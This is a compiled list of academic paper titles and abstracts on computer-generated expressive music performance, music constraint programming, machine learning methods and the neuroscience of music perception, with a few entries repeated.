Strasheela. Strasheela simplifies the definition of musical constraint satisfaction problems (CSP) by predefining building blocks required for such problems. At the same time, Strasheela preserves a high degree of generality and is reasonably efficient. Strasheela is highly generic, because it is highly programmable. In particular, three fundamental components are more programmable in Strasheela compared with existing music constraint systems: the music representation, the rule application mechanism, and the search process. Strasheela features an expressive symbolic music representation. This representation supports explicitly storing score information by sets of score objects, their attributes, and their hierarchic nesting. Any information available in the score is accessible from any object in the score and can be used to obtain derived information. The representation is complemented by the notion of variables: score information can be unknown and such information can be constrained. This research proposes a rule formalism which combines convenience and full user control to express which score variable sets are constrained by a given rule. A rule is a first-class function. A rule application mechanism is a higher-order function. A rule application mechanism traverses the score in order to apply a given rule to variable sets. This text presents rule application mechanisms suitable for a large set of musical CSPs and reproduces important mechanisms of existing systems. Strasheela is founded on a constraint programming model which makes the search process programmable at a high-level. The Strasheela user can optimise the search for a particular constraint satisfaction problem by programming a distribution strategy (a dynamic variable and value ordering) independent of the problem definition. Special distribution strategies for efficiently solving various musical CSPs – including complex polyphonic problems – are presented. --- paper_title: Rencon 2004: Turing Test for Musical Expression paper_content: Rencon is an annual international event that started in 2002. It has roles of (1) pursuing evaluation methods for systems whose output includes subjective issues, and (2) providing a forum for researches of several fields related to musical expression. In the past. Rencon was held as a workshop associated with a musical contest that provided a forum for presenting and discussing the latest research in automatic performance rendering. This year we introduce new evaluation methods of performance expression to Rencon: a Turing Test and a Gnirut Test, which is a reverse Turing Test, for performance expression. We have opened a section of the contests to any instruments and genre of music, including synthesized human voices. --- paper_title: Emotional Expression in Music Performance: Between the Performer's Intention and the Listener's Experience: paper_content: Nine professional musicians were instructed to perform short melodies using various instruments - the violin, electric guitar, flute, and singing voice - so as to communicate specific emotional characters to listeners. The performances were first validated by having listeners rating the emotional expression and then analysed with regard to their physical characteristics, e.g. tempo, dynamics, timing, and spectrum. The main findings were that (a) the performer's expressive intention had a marked effect on all analysed variables; (b) the performers showed many similarities as well as individual differences in emotion encoding; (c) listeners were generally successful in decoding the intended expression; and (d) some emotional characters seemed easier to communicate than others. The reported results imply that we are unlikely to find performance rules independent of instrument, musical style, performer, or listener. --- paper_title: OVERVIEW OF THE KTH RULE SYSTEM FOR MUSICAL PERFORMANCE paper_content: The KTH rule system models performance principles used by musicians when performing a musical score, within the realm of Western classical, jazz and popular music. An overview is given of the major rules involving phrasing, micro-level timing, metrical patterns and grooves, articulation, tonal tension, intonation, ensemble timing, and performance noise. By using selections of rules and rule quantities, semantic descriptions such as emotional expressions can be modeled. A recent real-time implementation provides the means for controlling the expressive character of the music. The communicative purpose and meaning of the resulting performance variations are discussed as well as limitations and future improvements. --- paper_title: Emotional Coloring of Computer-Controlled Music Performances paper_content: This dissertation presents research in the field ofautomatic music performance with a special focus on piano. A system is proposed for automatic music performance, basedon artificial neural networks (ANNs). A complex,ecological-predictive ANN was designed thatlistensto the last played note,predictsthe performance of the next note,looksthree notes ahead in the score, and plays thecurrent tone. This system was able to learn a professionalpianist's performance style at the structural micro-level. In alistening test, performances by the ANN were judged clearlybetter than deadpan performances and slightly better thanperformances obtained with generative rules. The behavior of an ANN was compared with that of a symbolicrule system with respect to musical punctuation at themicro-level. The rule system mostly gave better results, butsome segmentation principles of an expert musician were onlygeneralized by the ANN. Measurements of professional pianists' performances revealedinteresting properties in the articulation of notes markedstaccatoandlegatoin the score. Performances were recorded on agrand piano connected to a computer.Staccatowas realized by a micropause of about 60% ofthe inter-onset-interval (IOI) whilelegatowas realized by keeping two keys depressedsimultaneously; the relative key overlap time was dependent ofIOI: the larger the IOI, the shorter the relative overlap. Themagnitudes of these effects changed with the pianists' coloringof their performances and with the pitch contour. Theseregularities were modeled in a set of rules for articulation inautomatic piano music performance. Emotional coloring of performances was realized by means ofmacro-rules implemented in the Director Musices performancesystem. These macro-rules are groups of rules that werecombined such that they reflected previous observations onmusical expression of specific emotions. Six emotions weresimulated. A listening test revealed that listeners were ableto recognize the intended emotional colorings. In addition, some possible future applications are discussedin the fields of automatic music performance, music education,automatic music analysis, virtual reality and soundsynthesis. --- paper_title: Musical performance. A synthesis‐by‐rule approach paper_content: The general purpose of the present paper is to demonstrate some effects on the musical acceptability of a performance of a melody, which may be achieved by means of a synthesis‐by‐rule strategy. Both the structure of a melody and the playing technique of the performer seem important to the music perception and musical performance quality. The synthesis equipment used here consists of a computer controlled synthesizer. The input is the melody written in ordinary notation, and optionally complemented with phrase markers. This is the input material to a text‐to‐speech conversion program [Carlson and Granstrom, in Speech Communication II. edited by G. Fant (Stockholm, 1975) pp. 245‐253] now adapted to for notation‐to‐music conversion. Some of the rules relating the performance to the structure operate on a phase level, and other rules operate on sequences of two or three notes only. As regar‐s production aspects, the influence of a raising of the larynx in singing on the perceived musical quality of the perfo... --- paper_title: Attempts to Reproduce a Pianist?s Expressive Timing with Director Musices Performance Rules paper_content: The Director Musices generative grammar of music performance is a system of context dependent rules that automatically introduces expressive deviation in performances of input score files. A number ... --- paper_title: Real and Simulated Expression: A Listening Study paper_content: A number of attempts have been made in the past 10 to 15 years to construct artificial systems that can simulate human expressive performance, but few systematic studies of the relationship between model output and comparable human performances have been undertaken. In this study, we assessed listeners' responses to real and artificially generated performances. Subjects were asked to identify and evaluate performances of two differently notated editions of two pieces, played by a panel of experienced pianists and by an artificial performer. The results suggest that expressive timing and dynamics do not relate to one another in the simple manner that is implemented in the model (Todd, 1992) used here, that small objective differences in the expressive profiles of different performances can lead to distinctly different judgments by listeners, and that what appears to be the same expressive feature in performance can fulfill different functions. Although one purpose of such a study is to assess the model on which it is based, more important is its demonstration of the general value of comparing human data with a model. As is often the case, it is what the model does not explain that is most interesting. --- paper_title: Composer-Specific Aspects of Musical Performance: An Evaluation of Clynes's Theory of Pulse for Performances of Mozart and Beethoven paper_content: This report examines Clynes’s theory of “pulse” for performances of music by Mozart and Beethoven (e.g., Clynes, 1983, 1987). In three experiments that used a total of seven different compositions, an analysis-bysynthesis approach was used to examine the repetitive patterns of timing and loudness thought to be associated with performances of Mozart and Beethoven. Across performances, judgments by trained musicians provided support for some of the basic claims made by Clynes. However, judgments of individual performances were not always consistent with predictions. In Experiment 1, melodies were judged to be more musical if they were played with the pulse than if they were played with an altered version of the pulse or if they were played without expression. In Experiment 2, listeners were asked to judge whether performances of Mozart were “Mozartian” and whether performances of Beethoven were “Beethovenian.” Ratings were highest if the pulse of the composer was implemented, and significantly lower if the pulse of another composer was implemented (e.g., the Mozart pulse in the Beethoven piece) in all or part of each piece. In Experiment 3, a Beethoven piece was played with each of three pulses: Beethoven, Haydn, and Schubert. Listeners judged the version with the Beethoven pulse as most Beethovenian, but the version with the Haydn pulse as most “musical.” Although the overall results were encouraging, it is suggested that there are significant difficulties in evaluating Clynes’s theory and that much more research is needed before his ideas can be assessed adequately. The need for clarification of some theoretical issues surrounding the concept of pulse is emphasized. --- paper_title: Tempo Curves Revisited: Hierarchies of Performance Fields paper_content: In this article, we present a new view of the still-controversial phenomenon of musical tempo. Our perspective is guided by the ongoing development of a general theory of performance, together with its implementation as a performance workstation on the NeXTSTEP programming environment (Mazzola 1993). The main result of this approach is a formalism for the description of musical performance based on local and global hierarchies of particular vector fields. These performance fields are superimposed on the given musical score as a separate performance score and describe the guiding structure of the physical performance. As a special and concrete application of this general result, we expose the stratification of tempo into hierarchies of local tempo curves, connected to each other by systematic synchroneity relations. The theoretical material has been implemented in the MIDI software Presto version 2.0. This performance and composition tool enabled us to experiment with and to verify the practical use of the theoretical constructs. It was written in ANSI C by M. Waldvogel et al. and has a source code length of 110,000 words. It is available on Atari and Macintosh computers. --- paper_title: Generative Principles of Musical Thought Integration of Microstructure with Structure. paper_content: We shall describe recently discovered generative principles of musical thought which unify musical microstructure with structure, giving rise to musical integrity (Clynes, 1983, 1985, 1986). These principles appear to describe fundamental aspects of musical thought and are predictive in nature. They show how microstructure unfolds naturally from moment to moment, guided by structure. Their function is not conscious but is systematic; not explicit but secure. Since they may be used in musical synthesis itis readily shown that they can correctly model integral aspects of musical thought and provide good interpretations. (See footnote 1) We are here concerned about what these principles can tell us about musical thought and about thought itself. Musical thought is a particular kind of thought. It has much in common with non-musical thought and also much that is specific. Non-musical thought involves verbal language and/or non-verbal processes; it is clearly possible to a considerable degree to think without language. Does it make sense to ask what is left of musical thought if one removes musical language from it? In both musical as in non-musical thought, the largest portions of its processes are not conscious, and so this question involves unconsciously operating generative grammars. Evidence for this grammar is found in musical microstructure. --- paper_title: Toward an expert system for expressive musical performance paper_content: The development and implementation of an expert system that determines the tempo and articulations of Bach fugues are described. The rules in the knowledge base are based on the expertise of two professional performers. The system's input is a numeric representation of the fugue. The system processes the input using a transition graph, a data structure consisting of nodes where data is stored and edges that connect the nodes. The transition graph recognizes rhythmic patterns in the input. Once the system identifies a pattern, it applies a specific rule or performs a procedure. System output consists of a listing of tempo and articulation instructions. To validate the expert system, its output was compared with versions of fugues edited by one of the two experts used in developing the system. In tests with six fugues, the expert system generated the same editing instructions 85 to 90% of the time. > --- paper_title: jPop-E: an assistant system for performance rendering of ensemble music paper_content: This paper introduces jPop-E (java-based PolyPhrase Ensemble), an assistant system for the Pop-E performance rendering system. Using this assistant system, MIDI data including expressive tempo changes or velocity control can be created based on the user's musical intention. Pop-E (PolyPhrase Ensemble) is one of the few machine systems devoted to creating expressive musical performances that can deal with the structure of polyphonic music and the user's interpretation of the music. A well-designed graphical user interface is required to make full use of the potential ability of Pop-E. In this paper, we discuss the necessary elements of the user interface for Pop-E, and describe the implemented system, jPop-E. --- paper_title: Controlling musical emotionality: an affective computational architecture for influencing musical emotions paper_content: Emotions are a key part of creative endeavours, and a core problem for computational models of creativity. In this paper we discuss an affective computing architecture for the dynamic modification of music with a view to predictably affecting induced musical emotions. Extending previous work on the modification of perceived emotions in music, our system architecture aims to provide reliable control of both perceived and induced musical emotions: its emotionality. A rule-based system is used to modify a subset of musical features at two processing levels, namely score and performance. The interactive model leverages sensed listener affect by adapting the emotionality of the music modifications in real-time to assist the listener in reaching a desired emotional state. --- paper_title: Expression extraction in virtuoso music performances paper_content: An approach to music interpretation by computers is discussed. A rule-based music interpretation system is being developed that generates sophisticated performance from a printed music score. The authors describe the function of learning how to play music, which is the most important process in music interpretation. The target to be learned is expression rules and grouping strategy: expression rules are used to convert dynamic marks and motives into concrete performance data, and grouping strategy is used to extract motives from sequences of notes. They are learned from a given virtuoso performance. The delicate control of attack timing and of the duration and strength of the notes is extracted by the music transcription function. The performance rules are learned by investigating how the same or similar musical primitives are played in a performance. As for the grouping strategy, the system analyzes how the player grouped music and registers dominant note sequences to extract motives. > --- paper_title: The Analysis and Cognition of Basic Melodic Structures: The Implication-Realization Model paper_content: Eugene Narmour formulates a comprehensive theory of melodic syntax to explain cognitive relations between melodic tones at their most basic level. Expanding on the theories of Leonard B. Meyer, the author develops one parsimonious, scaled set of rules modeling implication and realization in all the primary parameters of music. Through an elaborate and original analytic symbology, he shows that a kind of "genetic code" governs the perception and cognition of melody. One is an automatic, "brute" system operating on stylistic primitives from the bottom up. The other constitutes a learned system of schemata impinging on style structures from the top down. The theoretical constants Narmour uses are context-free and, therefore, applicable to all styles of melody. He places considerable emphasis on the listener's cognitive performance (that is, fundamental melodic perception as opposed to acquired musical competence). He concentrates almost exclusively on low-level, note-to-note relations. The result is a highly generalized theory useful in researching all manner of psychological and music-theoretic problems concerned with the analysis and cognition of melody. "In this innovative, landmark book, a distinguished music theorist draws extensively from a variety of disciplines, in particular from cognitive psychology and music theory, to develop an elegant and persuasive framework for the understanding of melody. This book should be read by all scholars with a serious interest in music."--Diana Deutsch, Editor, Music Perception --- paper_title: Modeling and control of expressiveness in music performance paper_content: Expression is an important aspect of music performance. It is the added value of a performance and is part of the reason that music is interesting to listen to and sounds alive. Understanding and modeling expressive content communication is important for many engineering applications in information technology. For example, in multimedia products, textual information is enriched by means of graphical and audio objects. In this paper, we present an original approach to modify the expressive content of a performance in a gradual way, both at the symbolic and signal levels. To this purpose, we discuss a model that applies a smooth morphing among performances with different expressive content, adapting the audio expressive character to the user's desires. Morphing can be realized with a wide range of graduality (from abrupt to very smooth), allowing adaptation of the system to different situations. The sound rendering is obtained by interfacing the expressiveness model with a dedicated postprocessing environment, which allows for the transformation of the event cues. The processing is based on the organized control of basic audio effects. Among the basic effects used, an original method for the spectral processing of audio is introduced. --- paper_title: An Abstract Control Space for Communication of Sensory Expressive Intentions in Music Performance paper_content: Expressiveness is not an extravagance: instead, expressiveness plays a critical role in rational decision-making, in perception, in human interaction, in human emotions and in human intelligence. These facts, combined with the development of new informatics systems able to recognize and understand different kinds of signals, open new areas for research. A new model is suggested for computer understanding of sensory expressive intentions of a human performer and both theoretical and practical applications are described for human-computer interaction, perceptual information retrieval, creative arts and entertainment. Recent studies demonstrated that by opportunely modifying systematic deviations introduced by the musician it is possible to convey different sensitive contents, such as expressive intentions and/or emotions. We present an space, that can be used as a user interface. It represents, at an abstract level, the expressive content and the interaction between the performer and an expressive synthesizer. --- paper_title: Audio Morphing Different Expressive Intentions for Multimedia Systems paper_content: Web Extras: Sample audio files and view a demo of the audio authoring tool.Download Real Jukebox for listening to the mp3 filesSonatina in sol (by Beethoven) played neutral (without any expressive intentions)Expressive performance of Sonatina in sol generated by the model in a symbolic way (that is, as a MIDI file)Sonata K545 (by Mozart) played neutral (without any expressive intentions)Expressive performance of Sonata K545 generated by the model in a symbolic way (that is, as a MIDI file)Expressive performance of Sonata in A Major Op. V(by Corelli) generated by the audio authoring tool (using the audio postprocessing tool) --- paper_title: Artificial neural networks based models for automatic performance of musical scores paper_content: This article briefly summarises the author's research on automatic performance, started at CSC (Centro di Sonologia Computazionale, University of Padua) and continued at TMH-KTH (Speech, Music Hear ... --- paper_title: The Analysis and Cognition of Basic Melodic Structures: The Implication-Realization Model paper_content: Eugene Narmour formulates a comprehensive theory of melodic syntax to explain cognitive relations between melodic tones at their most basic level. Expanding on the theories of Leonard B. Meyer, the author develops one parsimonious, scaled set of rules modeling implication and realization in all the primary parameters of music. Through an elaborate and original analytic symbology, he shows that a kind of "genetic code" governs the perception and cognition of melody. One is an automatic, "brute" system operating on stylistic primitives from the bottom up. The other constitutes a learned system of schemata impinging on style structures from the top down. The theoretical constants Narmour uses are context-free and, therefore, applicable to all styles of melody. He places considerable emphasis on the listener's cognitive performance (that is, fundamental melodic perception as opposed to acquired musical competence). He concentrates almost exclusively on low-level, note-to-note relations. The result is a highly generalized theory useful in researching all manner of psychological and music-theoretic problems concerned with the analysis and cognition of melody. "In this innovative, landmark book, a distinguished music theorist draws extensively from a variety of disciplines, in particular from cognitive psychology and music theory, to develop an elegant and persuasive framework for the understanding of melody. This book should be read by all scholars with a serious interest in music."--Diana Deutsch, Editor, Music Perception --- paper_title: Saxex: A case-based reasoning system for generating expressive musical performances paper_content: Abstract The problem of generating expressive musical performances in the context of tenor saxophone interpretations was studied. Several recordings of a tenor sax playing different Jazz ballads with different degrees of expressiveness including an inexpressive interpretation of each ballad were made. These recordings were analyzed, using Sms spectral modeling techniques, to extract information related to several expressive parameters. This set of parameters and the scores constitute the set of cases (examples) of a case‐based system. From this set of cases, the system infers a set of possible expressive transformations for a given new phrase applying similarity criteria, based on background musical knowledge, between this new phrase and the set of cases. Finally, SaxEx applies the inferred expressive transformations to the new phrase using the synthesis capabilities of Sms. --- paper_title: A Case Based Approach to the Generation of Musical Expression paper_content: The majority of naturally sounding musical performance has musical expression (fluctuation in tempo, volume, etc.). Musical expression is affected by various factors, such as the performer, performative style, mood, and so forth. However, in past research on the computerized generation of musical expression, these factors are treated as being less significant, or almost ignored. Hence, the majority of past approaches find it relatively hard to generate multiple performance for a given piece of music with varying musical expression. ::: ::: In this paper, we propose a case-based approach to the generation of expressively modulated performance. This method enables the generation of varying musical expression for a single piece of music. We have implemented the proposed case-based method in a musical performance system, and, we also describe the system architecture and experiments performed on the system. --- paper_title: Machine Discoveries: A Few Simple, Robust Local Expression Principles paper_content: The paper presents a new approach to discovering general rules of expressive music performance from real performance data via inductive machine learning. A new learning algorithm is briefly presented, and then an experiment with a very large data set (performances of 13 Mozart piano sonatas) is described. The new learning algorithm succeeds in discovering some extremely simple and general principles of musical performance (at the level of individual notes), in the form of categorical prediction rules. These rules turn out to be very robust and general: when tested on performances by a different pianist and even on music of a different style (Chopin), they exhibit a surprisingly high degree of predictive accuracy. --- paper_title: Relational IBL in music with a new structural similarity measure paper_content: It is well known that many hard tasks considered in machine learning and data mining can be solved in an rather simple and robust way with an instance- and distance-based approach. In this paper we present another difficult task: learning, from large numbers of performances by concert pianists, to play music expressively. We model the problem as a multi-level decomposition and prediction task. Motivated by structural characteristics of such a task, we propose a new relational distance measure that is a rather straightforward combination of two existing measures. Empirical evaluation shows that our approach is in general viable and our algorithm, named DISTALL, is indeed able to produce musically interesting results. The experiments also provide evidence of the success of ILP in a complex domain such as music performance: it is shown that our instance-based learner operating on structured, relational data outperforms a propositional k-NN algorithm. --- paper_title: Can the Computer Learn to Play Music Expressively? paper_content: A computer system is described that provides a real-time musical accompaniment for a live soloist in a piece of non-improvised music. A Bayesian belief network is developed that represents the joint distribution on the times at which the solo and accompaniment notes are played as well as many hidden variables. The network models several important sources of information including the information contained in the score and the rhythmic interpretations of the soloist and accompaniment which are learned from examples. The network is used to provide a computationally e cient decision-making engine that utilizes all available information while producing a exible and musical accompaniment. --- paper_title: A Bayesian Network for Real-Time Musical Accompaniment paper_content: We describe a computer system that provides a real-time musical accompaniment for a live soloist in a piece of non-improvised music for soloist and accompaniment. A Bayesian network is developed that represents the joint distribution on the times at which the solo and accompaniment notes are played, relating the two parts through a layer of hidden variables. The network is first constructed using the rhythmic information contained in the musical score. The network is then trained to capture the musical interpretations of the soloist and accompanist in an off-line rehearsal phase. During live accompaniment the learned distribution of the network is combined with a real-time analysis of the soloist's acoustic signal, performed with a hidden Markov model, to generate a musically principled accompaniment that respects all available sources of knowledge. A live demonstration will be provided. --- paper_title: The Performance Worm: Real Time Visualisation of Expression based on Langner's Tempo-Loudness Animation paper_content: In an expressive performance, a skilled musician shapes the music by continuously modulating aspects like tempo and loudness to communicate high level information such as musical structure and emotion. Although automatic modelling of this phenomenon remains beyond the current state of the art, we present a system that is able to measure tempo and dynamics of a musical performance and to track their development over time. The system accepts raw audio input, tracks tempo and dynamics changes in real time, and displays the development of these expressive parameters in an intuitive and aesthetically appealing graphical format which provides insight into the expressive patterns applied by skilled artists. --- paper_title: Towards Machine Learning of Expressive Microtiming in Brazilian Drumming paper_content: We have used supervised machine learning to apply microtiming to music specified only in terms of quantized note times for a variety of percussion instruments. The output of the regression schemes we tried is simply the microtiming deviation to apply to each note. In particular, we trained Locally Weighted Linear Regression / KNearest-Neighbors (LWLR/KNN), Kernel Ridge Regression (KRR), and Gaussian Process Regression (GPR) on data from skilled human performance of a variety of Brazilian rhythms. Although our results are still far from the dream of inputting an arbitrary score and having the result sound as if expert human performers played it in the appropriate musical style, we believe we are on the right track. Evaluating our results with cross-validation, we found that the three methods are quite comparable, and in all cases the mean squared error is substantially less than the mean squared microtiming of the original data. Subjectively, our results are satisfactory; the applied microtiming captures some element of musical style and sounds much more expressive than the quantized input. --- paper_title: Gaussian processes for machine learning paper_content: We give a basic introduction to Gaussian Process regression models. We focus on understanding the role of the stochastic process and how it is used to define a distribution over functions. We present the simple equations for incorporating training data and examine how to learn the hyperparameters using the marginal likelihood. We explain the practical advantages of Gaussian Process and end with conclusions and a look at the current trends in GP work. --- paper_title: Nonlinear Component Analysis as a Kernel Eigenvalue Problem paper_content: A new method for performing a nonlinear form of principal component analysis is proposed. By the use of integral operator kernel functions, one can efficiently compute principal components in high-dimensional feature spaces, related to input space by some nonlinear map—for instance, the space of all possible five-pixel products in 16 × 16 images. We give the derivation of the method and present experimental results on polynomial feature extraction for pattern recognition. --- paper_title: The Nearest Neighbor Classification Rule with a Reject Option paper_content: An observation comes from one of two possible classes. If all the statistics of the problem are known, Bayes' classification scheme yields the minimum probability of error. If, instead, the statistics are not known and one is given only a labeled training set, it is known that the nearest neighbor rule has an asymptotic error no greater than twice that of Bayes' rule. Here the (k,k?) nearest neighbor rule with a reject option is examined. This rule looks at the k nearest neighbors and rejects if less than k? of these are from the same class; if k? or more are from one class, a decision is made in favor of that class. The error rate of such a rule is bounded in terms of the Bayes' error rate. --- paper_title: Evolving musical performance profiles using genetic algorithms with structural fitness paper_content: This paper presents a system that uses Genetic Algorithm (GA) to evolve hierarchical pulse sets (i.e., hierarchical duration vs. amplitude matrices) for expressive music performance by machines. The performance profile for a piece of music is represented using pulse sets and the fitness (for the GA) is derived from the structure of the piece to be performed; hence the term "structural fitness". Randomly initiated pulse sets are selected and evolved using GA. The fitness value is calculated by measuring the pulse set's ability of highlighting musical structures. This measurement is based upon generative rules for expressive music performance. This is the first stage of a project, which is aimed at the design of a dynamic model for the evolution of expressive performance profiles by interacting agents in an artificial society of musicians and listeners. --- paper_title: Inducing a generative expressive performance model using a sequential-covering genetic algorithm paper_content: In this paper, we describe an evolutionary approach to inducing a generative model of expressive music performance for Jazz saxophone. We begin with a collection of audio recordings of real Jazz saxophone performances from which we extract a symbolic representation of the musician's expressive performance. We then apply an evolutionary algorithm to the symbolic representation in order to obtain computational models for different aspects of expressive performance. Finally, we use these models to automatically synthesize performances with the expressiveness that characterizes the music generated by a professional saxophonist. --- paper_title: Composing Music by Composing Rules: Design and Usage of a Generic Music Constraint System paper_content: This research presents the design, usage, and evaluation of a highly generic music constraint system called Strasheela. Strasheela simplifies the definition of musical constraint satisfaction problems (CSP) by predefining building blocks required for such problems. At the same time, Strasheela preserves a high degree of generality and is reasonably efficient. Strasheela is highly generic, because it is highly programmable. In particular, three fundamental components are more programmable in Strasheela compared with existing music constraint systems: the music representation, the rule application mechanism, and the search process. Strasheela features an expressive symbolic music representation. This representation supports explicitly storing score information by sets of score objects, their attributes, and their hierarchic nesting. Any information available in the score is accessible from any object in the score and can be used to obtain derived information. The representation is complemented by the notion of variables: score information can be unknown and such information can be constrained. This research proposes a rule formalism which combines convenience and full user control to express which score variable sets are constrained by a given rule. A rule is a first-class function. A rule application mechanism is a higher-order function. A rule application mechanism traverses the score in order to apply a given rule to variable sets. This text presents rule application mechanisms suitable for a large set of musical CSPs and reproduces important mechanisms of existing systems. Strasheela is founded on a constraint programming model which makes the search process programmable at a high-level. The Strasheela user can optimise the search for a particular constraint satisfaction problem by programming a distribution strategy (a dynamic variable and value ordering) independent of the problem definition. Special distribution strategies for efficiently solving various musical CSPs – including complex polyphonic problems – are presented. --- paper_title: Autonomous Evolution of Complete Piano Pieces and Performances paper_content: Evolutionary algorithms are used to evolve musical score material and corresponding performance data, in an autonomous process. In this way complete piano compositions are created and subsequently performed on a computer-controlled grand piano. The efficiency of the creative evolution depends to a large extent on the representation used, which in this case is based on recursively described binary trees. They can represent a wide variety of musical material and corresponding performance data in a compact form, with an inherent potential for musically meaningful variations and archetypal musical gestures. This is combined with a set of automated formalized selection criteria based on experiences from human selection processes in a previous, interactive version of the same system, leading to surprisingly musical output and convincing performances. The system is also capable of rudimentary learning, through recycling of its own musical output, and an accumulated database of human musical input. --- paper_title: Data mining: practical machine learning tools and techniques with Java implementations paper_content: 1. What's It All About? 2. Input: Concepts, Instances, Attributes 3. Output: Knowledge Representation 4. Algorithms: The Basic Methods 5. Credibility: Evaluating What's Been Learned 6. Implementations: Real Machine Learning Schemes 7. Moving On: Engineering The Input And Output 8. Nuts And Bolts: Machine Learning Algorithms In Java 9. Looking Forward --- paper_title: The Local Boundary Detection Model (LBDM) and its application in the study of expressive timing paper_content: In this paper two main topics are addressed. Firstly, the Local Boundary Detection Model (LBDM) is described; this computational model enables the detection of local boundaries in a melodic surface and can be used for musical segmentation. The proposed model is tested against the punctuation rule system developed by Friberg et al. (1998) at KTH, Stockholm. Secondly, the expressive timing deviations found in a number of expert piano performances are examineded in relation to the local boundaries discovered by LBDM. As a result of a set of preliminary experiments, it is suggested that the assumption of final-note lengthening of a melodic gesture is not always valid and that, in some cases, the end of a melodic group is marked by lengthening the second-to-last note (or, seeing it from a different viewpoint, by delaying the last note). --- paper_title: Emergent Sound Repertoires in Virtual Societies paper_content: Computer Music Journal, 26:2, pp. 77–90, Summer 2002 2002 Massachusetts Institute of Technology. Computer simulations wherein musical forms may originate and evolve in artificially created worlds can be an effective way to study the origins and evolution of music. This article presents a simulation in which a society of distributed and autonomous but cooperative agents evolve sound repertoires from scratch by interacting with one another. We demonstrate by means of a concrete example the important role of mimetic interactions for music evolution in a virtual society. The article begins with a succinct commentary on the motivation for this research, its objectives, and the methodology for its realization. Then we state the objective of the particular simulation introduced in this article, followed by a detailed explanation of its design and functioning, along with a critical assessment of its results. --- paper_title: The Analysis and Cognition of Basic Melodic Structures: The Implication-Realization Model paper_content: Eugene Narmour formulates a comprehensive theory of melodic syntax to explain cognitive relations between melodic tones at their most basic level. Expanding on the theories of Leonard B. Meyer, the author develops one parsimonious, scaled set of rules modeling implication and realization in all the primary parameters of music. Through an elaborate and original analytic symbology, he shows that a kind of "genetic code" governs the perception and cognition of melody. One is an automatic, "brute" system operating on stylistic primitives from the bottom up. The other constitutes a learned system of schemata impinging on style structures from the top down. The theoretical constants Narmour uses are context-free and, therefore, applicable to all styles of melody. He places considerable emphasis on the listener's cognitive performance (that is, fundamental melodic perception as opposed to acquired musical competence). He concentrates almost exclusively on low-level, note-to-note relations. The result is a highly generalized theory useful in researching all manner of psychological and music-theoretic problems concerned with the analysis and cognition of melody. "In this innovative, landmark book, a distinguished music theorist draws extensively from a variety of disciplines, in particular from cognitive psychology and music theory, to develop an elegant and persuasive framework for the understanding of melody. This book should be read by all scholars with a serious interest in music."--Diana Deutsch, Editor, Music Perception --- paper_title: C4.5: Programs for Machine Learning paper_content: From the Publisher: ::: Classifier systems play a major role in machine learning and knowledge-based systems, and Ross Quinlan's work on ID3 and C4.5 is widely acknowledged to have made some of the most significant contributions to their development. This book is a complete guide to the C4.5 system as implemented in C for the UNIX environment. It contains a comprehensive guide to the system's use , the source code (about 8,800 lines), and implementation notes. The source code and sample datasets are also available on a 3.5-inch floppy diskette for a Sun workstation. ::: ::: C4.5 starts with large sets of cases belonging to known classes. The cases, described by any mixture of nominal and numeric properties, are scrutinized for patterns that allow the classes to be reliably discriminated. These patterns are then expressed as models, in the form of decision trees or sets of if-then rules, that can be used to classify new cases, with emphasis on making the models understandable as well as accurate. The system has been applied successfully to tasks involving tens of thousands of cases described by hundreds of properties. The book starts from simple core learning methods and shows how they can be elaborated and extended to deal with typical problems such as missing data and over hitting. Advantages and disadvantages of the C4.5 approach are discussed and illustrated with several case studies. ::: ::: This book and software should be of interest to developers of classification-based intelligent systems and to students in machine learning and expert systems courses. --- paper_title: From RTM-notation to ENP-score-notation paper_content: This paper discusses some recent developments within a compositional environment called PWGL. Our focus is to present how score information is represented in PWGL. We give some background information concerning the rhythmic notation that was used in PatchWork (a predecessor of PWGL). After this we show how this notation has been expanded so that it allows to generate very detailed scores that can contain besides the basic rhythmic structures also other information such as grace-notes, instrumentation, pitch and expressions. --- paper_title: Neural correlates of social and nonsocial emotions: An fMRI study paper_content: Abstract Common theories of emotion emphasize valence and arousal dimensions or alternatively, specific emotions, and the search for the underlying neurocircuitry is underway. However, it is likely that other important dimensions for emotional neurocircuitry exist, and one of them is sociality. A social dimension may code whether emotions are addressing an individual's biological/visceral need versus more remote social goals involving semantic meaning or intentionality. Thus, for practical purposes, social emotions may be distinguished from nonsocial emotions based in part on the presence of human forms. In the current fMRI study, we aimed to compare regional coding of the sociality dimension of emotion (nonsocial versus social) versus the valence dimension of emotion (positive versus negative). Using a novel fMRI paradigm, film and picture stimuli were combined to induce and maintain four emotions varying along social and valence dimensions. Nonsocial emotions of positively valenced appetite and negatively valenced disgust and social emotions of positively valenced joy/amusement and negatively valenced sadness were studied. All conditions activated the thalamus. Appetite and disgust activated posterior insula and visual cortex, whereas joy/amusement and sadness activated extended amygdala, superior temporal gyrus, hippocampus, and posterior cingulate. Activations within the anterior cingulate, nucleus accumbens, orbitofrontal cortex, and amygdala were modulated by both social and valence dimensions. Overall, these findings highlight that sociality has a key role in processing emotional valence, which may have implications for patient populations with social and emotional deficits. --- paper_title: Towards a neural basis of music perception paper_content: Music perception involves complex brain functions underlying acoustic analysis, auditory memory, auditory scene analysis, and processing of musical syntax and semantics. Moreover, music perception potentially affects emotion, influences the autonomic nervous system, the hormonal and immune systems, and activates (pre)motor representations. During the past few years, research activities on different aspects of music processing and their neural correlates have rapidly progressed. This article provides an overview of recent developments and a framework for the perceptual side of music processing. This framework lays out a model of the cognitive modules involved in music perception, and incorporates information about the time course of activity of some of these modules, as well as research findings about where in the brain these modules might be located. --- paper_title: ATTA: Automatic Time-Span Tree Analyzer Based on Extended GTTM paper_content: This paper describes a music analyzing system called the automatic time-span tree analyzer (ATTA), which we have developed. The ATTA derives a time-span tree that assigns a hierarchy of 'structural importance' to the notes of a piece of music based on the generative theory of tonal music (GTTM). Although the time-span tree has been applied with music summarization and collaborative music creation systems, these systems use time-span trees manually analyzed by experts in musicology. Previous systems based on GTTM cannot acquire a timespan tree without manual application of most of the rules, because GTTM does not resolve much of the ambiguity that exists with the application of the rules. To solve this problem, we propose a novel computational model of the GTTM that re-formalizes the rules with computer implementation. The main advantage of our approach is that we can introduce adjustable parameters, which enables us to assign priority to the rules. Our analyzer automatically acquires time-span trees by configuring the parameters that cover 26 rules out of 36 GTTM rules for constructing a time-span tree. Experimental results showed that after these parameters were tuned, our method outperformed a baseline performance. We hope to distribute the time-span tree as the content for various musical tasks, such as searching and arranging music. ---
